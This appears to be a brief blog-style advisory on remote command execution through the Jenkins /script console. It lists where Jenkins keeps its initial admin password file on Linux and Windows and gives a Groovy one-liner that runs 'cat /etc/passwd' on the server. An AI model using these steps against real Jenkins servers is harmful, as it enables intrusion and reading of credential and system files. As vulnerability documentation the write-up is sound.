Jenkins script remote command execution vulnerability
Jenkins script remote command execution vulnerability
Jenkins script remote command execution vulnerability
Vulnerability Description
Jenkins logs in to access the /script page, where there is a command execution vulnerability, which causes the server to be invaded when there is an unauthorized situation.
Vulnerability Impact
Jenkins
Network surveying and mapping
Vulnerability reappears
The account password exists at:
1
2
Linux: /var/lib/jenkins/secrets/initialAdminPassword
Windows: C:\Users\RabbitMask\.jenkins\secrets\initialAdminPassword
Log in to the background, or access without authorization
1
https://xxx.xxx.xxx.xxx/script
Execute system commands in the script command module
1
println 'cat /etc/passwd'.execute().text
This post is licensed under CC BY 4.0 by the author.